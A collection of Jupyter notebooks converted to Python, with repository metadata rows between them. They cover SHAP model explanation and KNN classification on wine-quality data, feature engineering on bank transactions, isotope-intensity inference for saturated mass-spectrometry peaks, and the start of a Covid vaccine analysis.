gbr.fit(X_train,y_train)
yhat = gbr.predict(X_test)
r2 = metrics.r2_score(y_test,yhat)
mse = metrics.mean_squared_error(y_test, yhat)
print(f'r2: {round(r2,4)}, mse:{round(mse,4)}')
# +
test_score = np.zeros((1000,), dtype=np.float64)
for i, y_pred in enumerate(gbr.staged_predict(X_test)):
test_score[i] = gbr.loss_(y_test, y_pred)
plt.figure(figsize=(12, 6))
plt.subplot(1, 2, 1)
plt.title('Custo Treino x Teste')
plt.plot(np.arange(1000) + 1, gbr.train_score_, 'b-',
label='Training Set Deviance')
plt.plot(np.arange(1000) + 1, test_score, 'r-',
label='Test Set Deviance')
plt.legend(loc='upper right')
plt.xlabel('Boosting Iterations')
plt.ylabel('Custo')
# -
feature_importance = gbr.feature_importances_
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.subplot(1, 2, 2)
plt.barh(pos, feature_importance[sorted_idx], align='center')
plt.yticks(pos, X.columns[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.show()
# # Bonus - Usando Teoria dos Jogos
#
#
# ## SHAP Values
#
# https://github.com/slundberg/shap
#
# Você viu (e usou) técnicas para extrair insights gerais de um modelo de aprendizado de máquina. Mas e se você quiser detalhar como o modelo funciona para uma previsão individual?
#
# Os valores SHAP (um acrônimo da SHApley Additive exPlanations) dividem uma previsão para mostrar o impacto de cada recurso. Onde você poderia usar isso?
#
#
# - Um modelo diz que um banco não deve emprestar dinheiro a alguém, e o banco é legalmente obrigado a explicar a base para cada rejeição de empréstimo.
#
# - Um profissional de saúde deseja identificar quais fatores estão direcionando o risco de alguma doença de cada paciente, para que possam abordar diretamente esses fatores de risco com intervenções de saúde direcionadas.
import shap
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
# ### Plot importance com shap values
# +
global_shap_vals = np.abs(shap_values).mean(0)[:-1]
variables_values = pd.DataFrame(list(zip(X_test.columns,global_shap_vals)))
variables_values.rename(columns={0:'variable',1:'shap_value'},inplace=True)
variables_values.sort_values(by=['shap_value'],ascending=False,inplace=True)
top_n = variables_values.head(25)
pos=range(0,-top_n.shape[0],-1)
plt.barh(pos, top_n['shap_value'], color="#1E88E5")
plt.yticks(pos, top_n['variable'])
plt.xlabel("mean SHAP value magnitude (change in log odds)")
plt.gcf().set_size_inches(8, 5.5)
plt.gca()
plt.show()
# -
# ### Resumo dos impactos das variáveis no modelo
# +
# , plot_type="layered_violin", color='coolwarm'
# -
shap.summary_plot(shap_values, X_test)
# ### Vamos entender agora como o Modelo afeta uma única predição
# +
row_to_show = 5
data_for_prediction = X_test.iloc[row_to_show] # use 1 row of data here. Could use multiple rows if desired
data_for_prediction_array = data_for_prediction.values.reshape(1, -1)
# Create object that can calculate shap values
explainer = shap.TreeExplainer(gbr)
# Calculate Shap values
shap_values = explainer.shap_values(data_for_prediction)
# -
# O objeto shap_values acima é uma lista com duas matrizes. A primeira matriz na lista é os valores de SHAP para um resultado negativo (não ganhe o prêmio). A segunda matriz é a lista de valores SHAP para o resultado positivo, que é como normalmente pensamos em previsões. É complicado revisar uma matriz bruta, mas o pacote shap tem uma boa maneira de visualizar os resultados.
# Interpretação: Valores em vermelho aumentam o rating médio e os valores azuis diminuem.
shap.initjs()
shap.force_plot(explainer.expected_value, shap_values, data_for_prediction)
# E se fizessemos o grafico acima para diversas observações? poderiamos entender por exemplo como o impacto das variáveis "evolui"?
#
# No grafico abaixo fizemos 100 graficos semelhantes ao de cima e viramos 90 graus
# visualize the training set predictions
shap_values = shap.TreeExplainer(gbr).shap_values(X_test.head(100))
shap.force_plot(explainer.expected_value, shap_values, X_test.head(100))
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
shap.dependence_plot("sulphates", shap_values, X_test)
shap_values = shap.TreeExplainer(gbr).shap_values(X_test)
shap.dependence_plot("volatile_acidity", shap_values, X_test)
# ### Para aprender como funciona por dentro utilize o paper original: https://arxiv.org/abs/1705.07874
#
#
# ### Para ter uma interpretação mais intuitiva, há diversos textos pela internet, como esse: https://medium.com/@gabrieltseng/interpreting-complex-models-with-shap-values-1c187db6ec83
#
#
| 9,464 |
/FE/hw1/hw_data_processing.ipynb
|
0c13c707bb348c59fa0bd0084153da7a033fc407
|
[] |
no_license
|
alexpon92/ntlg_test
|
https://github.com/alexpon92/ntlg_test
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 997,437 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 导入相应的包
import pandas as pd
#皮尔逊相关系数
from scipy.stats import pearsonr
#标准化
from sklearn.preprocessing import StandardScaler
#数据划分
from sklearn.model_selection import train_test_split
#KNN
from sklearn.neighbors import KNeighborsClassifier
#交叉检验
from sklearn.model_selection import cross_val_score
# # 获取数据集
data=pd.read_csv("./winequality-white.csv",sep=";")
# # 特征处理
# ## 比较各特征间的皮尔逊相关系数
data_title = data.columns.values.tolist()
for i in range(len(data_title)):
for j in range(i+1,len(data_title)):
print('%s和%s之间的皮尔逊相关系数为%f'%(data_title[i],data_title[j],pearsonr(data[data_title[i]],data[data_title[j]])[0]))
# ## 给白酒质量分类
def Quality(e):
    """Bucket a 0-10 wine-quality score: 'bad' (<= 4), 'ordinary' (5-7), 'good' (> 7).

    Fix: the original tested ``e > 0 and e <= 4``, so a score of 0 fell
    through to 'good'; scores at or below 4 are now consistently 'bad'.
    """
    if e <= 4:
        return 'bad'
    elif e <= 7:
        return 'ordinary'
    else:
        return 'good'
data['Quality'] = data['quality'].map(Quality)
data.drop(['quality'],axis=1,inplace=True)
# ## 去掉皮尔逊相关系数高的特征
# 去掉“free sulfur dioxide”、“density”,“pH”
data2=data[["fixed acidity","volatile acidity","citric acid","residual sugar","chlorides","free sulfur dioxide","sulphates","alcohol"]]
data3=data.Quality
# # 机器学习
# ## 划分数据集
x_train,x_test,y_train,y_test = train_test_split(data2,data3,test_size =0.2,random_state = 6)
# ## 五折交叉验证
# +
#使用KNN算法模型
model = KNeighborsClassifier()
score=cross_val_score(model,data2,data3,cv=5,scoring='accuracy')
print ('平均准确率',score.mean())
print ('每则准确率',score)
# -
return 'night_0_6'
def group_by_hour(df):
    """Count each client's transactions per time-of-day bucket, one column per bucket.

    Parses ``TRDATETIME`` strings ('%d%b%y:%H:%M:%S'), maps the hour through
    the module-level ``process_hour`` to a bucket label, and pivots the
    per-client counts into wide format (missing buckets filled with 0).
    """
    tmp = df.copy(deep=True)
    tmp['day_time'] = tmp['TRDATETIME'].apply(
        lambda ts: process_hour(
            datetime.datetime.strptime(ts, '%d%b%y:%H:%M:%S').strftime('%H')
        )
    )
    return tmp.groupby(['cl_id', 'day_time'])['cl_id'].size().unstack().fillna(0).reset_index()
# -
grouped_by_hour = group_by_hour(transactions_train)
grouped_by_hour.head(10)
grouped_by_hour[['afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']].describe()
grouped_by_hour[['afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']].sum()
_ = scatter_matrix(
grouped_by_hour[['cl_id', 'afternoon_12_18', 'evening_18_0', 'morning_6_12', 'night_0_6']], figsize=(15, 10)
)
# Как мы можем наблюдать, основное кол-во транзакций приходится на ночное время, однако по данному сету не ясно, в какой временной зоне находятся наши пользователи.
# *Далее, разделим время выполнение транзакции по дням недели*
def group_by_day(df):
    """Count each client's transactions per weekday name, one column per weekday.

    Parses ``TRDATETIME`` strings ('%d%b%y:%H:%M:%S') into weekday names
    (strftime '%A') and pivots the per-client counts into wide format
    (missing weekdays filled with 0).
    """
    tmp = df.copy(deep=True)
    tmp['day_time'] = tmp['TRDATETIME'].apply(
        lambda ts: datetime.datetime.strptime(ts, '%d%b%y:%H:%M:%S').strftime('%A')
    )
    return tmp.groupby(['cl_id', 'day_time'])['cl_id'].size().unstack().fillna(0).reset_index()
grouped_by_day = group_by_day(transactions_train)
grouped_by_day.head(10)
grouped_by_day[['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']].sum()
_ = scatter_matrix(
grouped_by_day[['cl_id', 'Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']], figsize=(15, 10)
)
# Как мы видим, по дням транщакции распределены довольно равномерно.
# ##### Далее рассмотрим параметр currency
transactions_train['currency'].value_counts(normalize=True)[:10]
# $\approx 97%$ - проходят по одной валюте, код 810. Для дальнейшего анализа можно пойти на упрощение и рассматривать операции только в двух типах:
# 1. main_type
# 2. other_types
# Тогда произведем кодирование и построим датасет с новыми значениями валют
def prepare_currency(df):
    """Count each client's transactions in the dominant currency (code 810) vs all others.

    Produces a wide frame with columns 'main_type' (currency 810) and
    'other_types' (everything else), missing combinations filled with 0.
    """
    tmp = df.copy(deep=True)
    # NOTE: 'currrency_enc' (triple r) is kept as-is — it only names an
    # intermediate column and the output columns come from its values.
    tmp['currrency_enc'] = tmp['currency'].apply(
        lambda code: 'main_type' if code == 810 else 'other_types'
    )
    return tmp.groupby(['cl_id', 'currrency_enc'])['cl_id'].size().unstack().fillna(0).reset_index()
currency_df = prepare_currency(transactions_train)
currency_df[['main_type', 'other_types']].describe()
_ = scatter_matrix(
currency_df[['cl_id', 'main_type', 'other_types']], figsize=(15, 10)
)
# Ничего конкретного по распределению сказать нельзя, можно лишь сказать, что, в основном, кол-во транзакций пользователей в отрезке [0, 200] операций
# ##### Далее рассмотрим параметр channel_type
transactions_train['channel_type'].value_counts(dropna=False, normalize=True)
# В нашей выборке превалируют два типа - type1, type2. Остальные типы, включая неизвестный, составляют $\approx 3%$. Исходя из этого, объединим все типы, кроме первого и второго в typeOther и посмотрим на распределение
# +
def group_by_channel_types(df):
    """Count each client's transactions per channel: 'type1', 'type2', or 'typeOther'.

    Missing channels and any channel other than type1/type2 are folded into
    'typeOther'; counts are pivoted into wide format with 0 for absent
    combinations.
    """
    tmp = df.copy()
    channel = tmp['channel_type'].fillna('typeOther')
    tmp['channel_type'] = channel.where(channel.isin(['type1', 'type2']), 'typeOther')
    return (
        tmp[['cl_id', 'channel_type']]
        .groupby(['cl_id', 'channel_type'])
        .size()
        .unstack()
        .fillna(0)
        .reset_index()
    )
channel_type_gr = group_by_channel_types(transactions_train)
channel_type_gr[['type1', 'type2', 'typeOther']].describe()
# -
# ##### Далее рассмотрим параметр MCC
# Для начала проанализируем, в какой пропорции представлен каждый MCC
# +
border_val = 0.004 # border percent, from which we are not considering mcc
mcc_values = raw_df['MCC'].value_counts(normalize=True).to_dict()
total_outsiders = []
popular_mcc = []
[total_outsiders.append(val) if val < border_val else popular_mcc.append(key) for key, val in mcc_values.items()]
print(f'Общий процент непопулярных MCC {round(sum(total_outsiders) * 100, 3)}% при пороговом значении доли MCC {border_val * 100}%')
print(f'Кол-во популярных MCC {len(popular_mcc)}')
# -
# Выделим популярные MCC, а остальные объединим в одну категорию
# +
def group_and_encode_by_mcc(df, popular_mcc_codes):
    """One column of per-client transaction counts per popular MCC code, plus 'MCC_other'.

    Every code in ``popular_mcc_codes`` gets a column even when no
    transaction uses it (filled with 0), so downstream feature matrices
    always have the same layout.

    Fix: the original built the expected-column set from the module-level
    ``popular_mcc`` instead of the ``popular_mcc_codes`` argument, so
    calling it with a different code list silently produced wrong columns.
    """
    mcc_trs = df.copy()
    mcc_trs['mcc_enc'] = mcc_trs['MCC'].apply(
        lambda x: 'MCC_{}'.format(x) if x in popular_mcc_codes else 'MCC_other'
    )
    expected = {'MCC_{}'.format(code) for code in popular_mcc_codes}
    expected.add('MCC_other')

    mcc_trs = (
        mcc_trs[['cl_id', 'mcc_enc']]
        .groupby(['cl_id', 'mcc_enc'])
        .size()
        .unstack()
        .fillna(0)
        .reset_index()
    )
    # Add zero-filled columns for popular codes absent from this sample.
    present = {col for col in mcc_trs.columns.values if col.find('MCC_') != -1}
    for missing in expected - present:
        mcc_trs[missing] = 0
    return mcc_trs
grouped_by_mcc = group_and_encode_by_mcc(transactions_train, popular_mcc)
grouped_by_mcc.describe()
# -
# ##### Далее рассмотрим параметр trx_category
transactions_train['trx_category'].value_counts(normalize=True)
# +
def group_by_trx_cat(df):
    """Count each client's transactions per transaction category, one column per category."""
    counts = df[['cl_id', 'trx_category']].groupby(['cl_id', 'trx_category']).size()
    return counts.unstack().fillna(0).reset_index()
grouped_by_trx_cat = group_by_trx_cat(transactions_train)
grouped_by_trx_cat.describe()
# -
# #### Формирование итогового сета
# +
def group_and_aggregate_data(df, popular_mcc):
    """Join all per-client feature groups on cl_id into one wide feature frame.

    Combines the hour-of-day, weekday, currency, channel-type, MCC and
    transaction-category count frames produced by the sibling helpers.
    """
    parts = [
        group_by_hour(df),
        group_by_day(df),
        prepare_currency(df),
        group_by_channel_types(df),
        group_and_encode_by_mcc(df, popular_mcc),
        group_by_trx_cat(df),
    ]
    result, *rest = [part.set_index('cl_id') for part in parts]
    for part in rest:
        result = result.join(part)
    return result
train_result_set = group_and_aggregate_data(transactions_train, popular_mcc)
train_result_set.head(10)
# -
def get_target_flag(df):
    """Collapse transactions to one target_flag per unique (cl_id, target_flag) pair.

    The groupby sorts by cl_id, so with one flag per client this yields one
    label per client in cl_id order — matching the aggregated feature rows.
    """
    grouped = df[['cl_id', 'target_flag']].groupby(['cl_id', 'target_flag']).sum()
    return grouped.reset_index()['target_flag'].copy()
# #### Обучим нашу модель
# +
from sklearn.linear_model import LinearRegression
import sklearn.metrics as sk_metrics
train_target_flag_vals = get_target_flag(transactions_train)
lin_reg = LinearRegression()
lin_reg.fit(train_result_set, train_target_flag_vals)
# -
# on train sample
predictions_for_train = lin_reg.predict(train_result_set)
# on test sample
test_set = group_and_aggregate_data(transactions_test, popular_mcc)
test_target_flag_vals = get_target_flag(transactions_test)
predictions_for_test = lin_reg.predict(test_set)
# +
roc_auc_train = np.round(sk_metrics.roc_auc_score(train_target_flag_vals, predictions_for_train), 2)
roc_auc_test = np.round(sk_metrics.roc_auc_score(test_target_flag_vals, predictions_for_test), 2)
print(f'AUC for train {roc_auc_train}')
print(f'AUC for test {roc_auc_test}')
# +
fpr_train, tpr_train, thresholds_train = sk_metrics.roc_curve(train_target_flag_vals, predictions_for_train)
fpr_test, tpr_test, thresholds_test = sk_metrics.roc_curve(test_target_flag_vals, predictions_for_test)
matplotlib.rcParams['figure.figsize'] = (10.0, 10.0)
plt.plot(fpr_train, tpr_train, label='Train ROC AUC {0}'.format(roc_auc_train))
plt.plot(fpr_test, tpr_test, label='Test ROC AUC {0}'.format(roc_auc_test))
plt.plot([0, 1], [0, 1], '--', color=(0.6, 0.6, 0.6))
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('XGB Classifier', size=16)
plt.legend(loc='lower right')
plt.show()
# -
# В результате мы получили значение AUC равное 0.7, что в принципе говорит о том, что выбранная модель сравнительна неплоха =)
| 9,673 |
/finalProject/model_ipynb.ipynb
|
6b3d80cca232354c2a07c1b037c87a0483c54e3e
|
[] |
no_license
|
1nconsistent/Emotiondetection
|
https://github.com/1nconsistent/Emotiondetection
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 3,210 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import expanduser
PROTON_MASS = 1.007276
# the level of intensity at which the detector is in saturation
SATURATION_INTENSITY = 3000
# the number of isotopes to look for in the m/z dimension - the theoretical model includes 7 (the monoisotopic plus 6 isotopes)
NUMBER_OF_ISOTOPES = 7
def calculate_monoisotopic_mass_from_mz(monoisotopic_mz, charge):
    """Neutral monoisotopic mass from an observed m/z: total mass minus `charge` protons.

    Uses the module-level PROTON_MASS constant.  The arithmetic order
    (multiply first, subtract second) matches the original exactly so the
    floating-point result is bit-identical.
    """
    total_mass = monoisotopic_mz * charge
    proton_contribution = PROTON_MASS * charge
    return total_mass - proton_contribution
# Find the ratio of H(peak_number)/H(peak_number-1) for peak_number=1..6
# peak_number = 0 refers to the monoisotopic peak
# number_of_sulphur = number of sulphur atoms in the molecule
#
# source: Valkenborg et al, "A Model-Based Method for the Prediction of the Isotopic Distribution of Peptides", https://core.ac.uk/download/pdf/82021511.pdf
def peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur):
    """Return the predicted isotope peak-height ratio H(peak_number)/H(peak_number-1).

    Implements the polynomial model of Valkenborg et al., "A Model-Based
    Method for the Prediction of the Isotopic Distribution of Peptides"
    (https://core.ac.uk/download/pdf/82021511.pdf).  peak_number 0 is the
    monoisotopic peak, so valid requests are peak_number 1..6.  The model is
    fitted for molecules containing 0, 1 or 2 sulphur atoms and is only valid
    inside a peak- and sulphur-specific monoisotopic-mass window; outside
    that domain the function returns None.
    """
    # Fourth-order polynomial coefficients (beta0..beta4, ascending powers of
    # monoisotopic_mass/1000), keyed by sulphur count and then by peak number.
    coefficients = {
        0: {
            1: np.array([-0.00142320578040, 0.53158267080224, 0.00572776591574, -0.00040226083326, -0.00007968737684]),
            2: np.array([0.06258138406507, 0.24252967352808, 0.01729736525102, -0.00427641490976, 0.00038011211412]),
            3: np.array([0.03092092306220, 0.22353930450345, -0.02630395501009, 0.00728183023772, -0.00073155573939]),
            4: np.array([-0.02490747037406, 0.26363266501679, -0.07330346656184, 0.01876886839392, -0.00176688757979]),
            5: np.array([-0.19423148776489, 0.45952477474223, -0.18163820209523, 0.04173579115885, -0.00355426505742]),
            6: np.array([0.04574408690798, -0.05092121193598, 0.13874539944789, -0.04344815868749, 0.00449747222180]),
        },
        1: {
            1: np.array([-0.01040584267474, 0.53121149663696, 0.00576913817747, -0.00039325152252, -0.00007954180489]),
            2: np.array([0.37339166598255, -0.15814640001919, 0.24085046064819, -0.06068695741919, 0.00563606634601]),
            3: np.array([0.06969331604484, 0.28154425636993, -0.08121643989151, 0.02372741957255, -0.00238998426027]),
            4: np.array([0.04462649178239, 0.23204790123388, -0.06083969521863, 0.01564282892512, -0.00145145206815]),
            5: np.array([-0.20727547407753, 0.53536509500863, -0.22521649838170, 0.05180965157326, -0.00439750995163]),
            6: np.array([0.27169670700251, -0.37192045082925, 0.31939855191976, -0.08668833166842, 0.00822975581940]),
        },
        2: {
            1: np.array([-0.01937823810470, 0.53084210514216, 0.00580573751882, -0.00038281138203, -0.00007958217070]),
            2: np.array([0.68496829280011, -0.54558176102022, 0.44926662609767, -0.11154849560657, 0.01023294598884]),
            3: np.array([0.04215807391059, 0.40434195078925, -0.15884974959493, 0.04319968814535, -0.00413693825139]),
            4: np.array([0.14015578207913, 0.14407679007180, -0.01310480312503, 0.00362292256563, -0.00034189078786]),
            5: np.array([-0.02549241716294, 0.32153542852101, -0.11409513283836, 0.02617210469576, -0.00221816103608]),
            6: np.array([-0.14490868030324, 0.33629928307361, -0.08223564735018, 0.01023410734015, -0.00027717589598]),
        },
    }
    # Model domain: the lowest valid monoisotopic mass depends on the peak
    # number and sulphur count (tuples indexed by sulphur count), while the
    # highest valid mass depends on the sulphur count only.
    lowest_valid_mass = {
        1: (498, 530, 562),
        2: (498, 530, 562),
        3: (498, 530, 562),
        4: (907, 939, 971),
        5: (1219, 1251, 1283),
        6: (1559, 1591, 1623),
    }
    highest_valid_mass = (3915, 3947, 3978)

    ratio = None
    if (peak_number in lowest_valid_mass) and (number_of_sulphur in coefficients):
        mass_floor = lowest_valid_mass[peak_number][number_of_sulphur]
        mass_ceiling = highest_valid_mass[number_of_sulphur]
        if mass_floor <= monoisotopic_mass <= mass_ceiling:
            beta0, beta1, beta2, beta3, beta4 = coefficients[number_of_sulphur][peak_number]
            scaled_m = monoisotopic_mass / 1000.0
            ratio = beta0 + (beta1*scaled_m) + beta2*(scaled_m**2) + beta3*(scaled_m**3) + beta4*(scaled_m**4)
    return ratio
# Worked example: seven synthetic isotope peaks for a 2+ ion, with the lower
# isotopes assumed saturated.  Isotope 4 is the first peak trusted to be out
# of saturation and is used as the reference for inference.
isotope_idx_not_in_saturation = 4
# +
isotope_intensities_l = []
isotope_intensities_l.append((1130.578349, 10000))
isotope_intensities_l.append((1131.080031, 12000))
isotope_intensities_l.append((1131.581029, 11000))
isotope_intensities_l.append((1132.082188, 10500))
isotope_intensities_l.append((1132.582894, 10000))
isotope_intensities_l.append((1133.084192, 9500))
isotope_intensities_l.append((1133.585446, 9000))
isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['mz_centroid','summed_intensity'])
# -
charge = 2
monoisotopic_mz = isotope_intensities_df.iloc[0].mz_centroid
monoisotopic_mass = calculate_monoisotopic_mass_from_mz(monoisotopic_mz, charge)
# NOTE(review): the computed mass is immediately overwritten with a
# hard-coded value here - presumably deliberate for the example, but confirm.
monoisotopic_mass = 1170
# +
isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity # set the summed intensity to be the default adjusted intensity for all isotopes
isotope_intensities_df['inferred'] = False
# adjust the monoisotopic intensity if it has points in saturation. We can use an isotope that's
# not in saturation as a reference, as long as there is one
if (isotope_idx_not_in_saturation is not None) and (isotope_idx_not_in_saturation > 0):
    # using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
    Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
    # walk from the reference isotope down to the monoisotopic peak, dividing
    # by the modelled peak-height ratio at each step: H(p-1) = H(p) / ratio(p)
    for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
        phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
        if phr is not None:
            Hpn_minus_1 = Hpn / phr
            isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
            isotope_intensities_df.at[peak_number-1, 'inferred'] = True
            Hpn = Hpn_minus_1
        else:
            # outside the model's valid mass range - stop inferring
            break
intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
inferred = int(isotope_intensities_df.iloc[0].inferred) # whether the monoisotope intensity was inferred
# -
isotope_intensities_df
intensity
# +
# Stem plot comparing raw (green) vs saturation-adjusted (orange) isotope
# intensities for the worked example above.
f, ax = plt.subplots()
colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple', 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']
markerline, stemlines, baseline = ax.stem(isotope_intensities_df.mz_centroid, isotope_intensities_df.summed_intensity, use_line_collection=True, label='before adjustment for saturation')
plt.setp(markerline, 'color', 'tab:green')
plt.setp(stemlines, 'color', 'tab:green')
plt.setp(baseline, 'color', colors[7])
plt.setp(markerline, 'alpha', 0.6)
plt.setp(stemlines, 'alpha', 0.6)
markerline, stemlines, baseline = ax.stem(isotope_intensities_df.mz_centroid, isotope_intensities_df.inferred_intensity, use_line_collection=True, label='after adjustment for saturation')
plt.setp(markerline, 'color', 'tab:orange')
plt.setp(stemlines, 'color', 'tab:orange')
plt.setp(baseline, 'color', colors[7])
plt.setp(markerline, 'alpha', 0.6)
plt.setp(stemlines, 'alpha', 0.6)
plt.xlabel('m/z')
plt.ylabel('intensity')
f.set_figheight(3)
f.set_figwidth(7)
f.set_dpi(160)
plt.margins(0.02)
plt.legend(loc='best')
# plt.title('Isotopes before and after saturation adjustment')
plt.show()
# -
# #### plot the maximum inferred intensity
# Parameters for sweeping the model across the instrument's m/z and charge
# range: the largest summed intensity a peak can report before saturating,
# and the resulting span of monoisotopic masses to evaluate.
MAX_SUMMED_APEX_POINTS = 3 * SATURATION_INTENSITY
isotope_idx_not_in_saturation = 4
mz_lower = 300
mz_upper = 1700
charge_lower = 2
charge_upper = 4
isotope_not_saturated_indexes = [1,2,3,4,5,6] # index of the first isotope not saturated
mono_mass_lower = calculate_monoisotopic_mass_from_mz(mz_lower, charge_lower)
mono_mass_upper = calculate_monoisotopic_mass_from_mz(mz_upper, charge_upper)
mono_mass_lower, mono_mass_upper
mono_mass_values = list(np.arange(start=mono_mass_lower, stop=mono_mass_upper))
# For each candidate "first unsaturated isotope" index, sweep the whole mass
# range and record the largest monoisotopic intensity that could be inferred
# when every peak up to that index is pinned at the saturation ceiling.
isotopes_l = []
for isotope_idx_not_in_saturation in isotope_not_saturated_indexes:
    mono_intensities_l = []
    for monoisotopic_mass in mono_mass_values:
        # start every isotope at the saturation ceiling
        isotope_intensities_l = list(np.full((NUMBER_OF_ISOTOPES,), MAX_SUMMED_APEX_POINTS))
        isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['summed_intensity'])
        isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity
        isotope_intensities_df['inferred'] = False
        # using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
        Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
        for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
            phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
            if phr is not None:
                Hpn_minus_1 = Hpn / phr
                isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
                isotope_intensities_df.at[peak_number-1, 'inferred'] = True
                Hpn = Hpn_minus_1
            else:
                # mass outside the model's valid window for this peak
                break
        monoisotope_intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
        inferred = int(isotope_intensities_df.iloc[0].inferred) # whether the monoisotope intensity was inferred
        mono_intensities_l.append((monoisotopic_mass,monoisotope_intensity,inferred))
    mono_intensities_df = pd.DataFrame(mono_intensities_l, columns=['monoisotopic_mass','inferred_mono_intensity','inferred'])
    isotopes_l.append(mono_intensities_df)
# Tableau 20 colour palette, given as 0-255 RGB triples.
tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
             (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
             (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
             (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
             (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
# Rescale to values between 0 and 1
for i in range(len(tableau20)):
    r, g, b = tableau20[i]
    tableau20[i] = (r / 255., g / 255., b / 255.)
# +
# Plot the maximum inferrable monoisotopic intensity against monoisotopic
# mass, one curve per choice of "first unsaturated isotope".
f, ax = plt.subplots()
f.set_figheight(5)
f.set_figwidth(7)
f.set_dpi(160)
plt.margins(x=0.06, y=0.02)
plt.xticks(fontsize=8)
plt.yticks(fontsize=8)
# title = 'maximum inferred intensity by monoisotopic mass'
# plt.title(title)
for idx in range(len(isotopes_l)):
    mono_intensities_df = isotopes_l[idx]
    # only plot masses where inference actually succeeded
    plot_df = mono_intensities_df[mono_intensities_df.inferred == True]
    # NOTE(review): `idx+1 % len(tableau20)` binds as `idx + (1 % len(...))`
    # i.e. idx+1; probably `(idx+1) % len(tableau20)` was intended.  Harmless
    # here (only 6 curves) but would IndexError with 20+ curves.
    ax.plot(plot_df.monoisotopic_mass, np.log2(plot_df.inferred_mono_intensity), marker='', color=tableau20[idx+1 % len(tableau20)], linestyle='-', linewidth=1, ms=2, label='isotope {} not saturated'.format(idx+1))
plt.axhline(y=np.log2(MAX_SUMMED_APEX_POINTS), color='red', linestyle='-.', linewidth=1, label='maximum unsaturated mono intensity')
plt.legend(loc='best', fontsize=8)
plt.xlabel('monoisotopic mass (Da)', fontsize=8)
plt.ylabel('log2 inferred intensity', fontsize=8)
plt.show()
# -
f.savefig('{}/paper-2-figure-9.tiff'.format(expanduser('~')), dpi=300, bbox_inches='tight')
# Re-run the inference for a single monoisotopic mass, with every peak
# starting at the saturation ceiling.
monoisotopic_mass = 1170.563881
# +
isotope_intensities_l = list(np.full((NUMBER_OF_ISOTOPES,), MAX_SUMMED_APEX_POINTS))
isotope_intensities_df = pd.DataFrame(isotope_intensities_l, columns=['summed_intensity'])
isotope_intensities_df['inferred_intensity'] = isotope_intensities_df.summed_intensity
isotope_intensities_df['inferred'] = False
# using as a reference the most intense isotope that is not in saturation, derive the isotope intensities back to the monoisotopic
Hpn = isotope_intensities_df.iloc[isotope_idx_not_in_saturation].summed_intensity
for peak_number in reversed(range(1,isotope_idx_not_in_saturation+1)):
    phr = peak_ratio(monoisotopic_mass, peak_number, number_of_sulphur=0)
    if phr is not None:
        Hpn_minus_1 = Hpn / phr
        isotope_intensities_df.at[peak_number-1, 'inferred_intensity'] = int(Hpn_minus_1)
        isotope_intensities_df.at[peak_number-1, 'inferred'] = True
        Hpn = Hpn_minus_1
    else:
        break
monoisotope_intensity = int(isotope_intensities_df.iloc[0].inferred_intensity) # the inferred saturation
# -
monoisotope_intensity
| 13,615 |
/Higgins_Capstone.ipynb
|
2b2d97ce07bd347d9df1f426b28115dc0d62b12a
|
[] |
no_license
|
cahigginsNEU/ALY6140
|
https://github.com/cahigginsNEU/ALY6140
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 129,965 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#Covid Vaccine Rates in the United States
# +
#Data Extraction
import pandas as pd
import io
import requests
import matplotlib.pyplot as plt
import numpy as np
import datetime
import seaborn as sns
from sklearn.linear_model import LinearRegression
from matplotlib.colors import LogNorm
import warnings
warnings.filterwarnings('ignore')
